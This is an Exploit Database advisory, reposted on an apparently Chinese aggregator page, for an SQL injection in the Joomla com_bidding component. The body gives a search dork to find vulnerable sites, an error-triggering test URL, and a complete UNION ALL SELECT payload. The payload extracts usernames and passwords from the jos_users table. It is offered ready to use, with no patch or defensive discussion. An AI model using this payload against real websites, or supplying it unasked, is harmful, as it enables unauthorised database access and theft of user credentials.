Joomla! Component com_bidding – SQL Injection

• Exploit Database
• 11 阅读

• 作者： N2n-Hacker
  日期： 2010-03-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11766/

• #########################################################################
  #########################################################################
  
  [ Joomla com_bidding Sql Injection Vulnerability ]
  
  N2n-Hacker ----- 2nd@live.fr<mailto:2nd@live.fr>
  
  
  #########################################################################
  #########################################################################
  
  
  # Searching = "option=com_bidding"
  
  
  ==> http://www.site.com/index.php?option=com_bidding&id=200' <=[SQLi]--
  
  # error =
  "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result"
  
  
  ==> Exploiting = http://www.site.com/index.php?option=com_bidding&id=-200 UNION ALL SELECT 1,2,
  concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from jos_users--
  
  
  
  \\\\\\\\\\\\\\\\\\ Activer khfif drif //////////////////
  
  #########################################################################
  My Bad Life But Not For4ver nchallah
  #########################################################################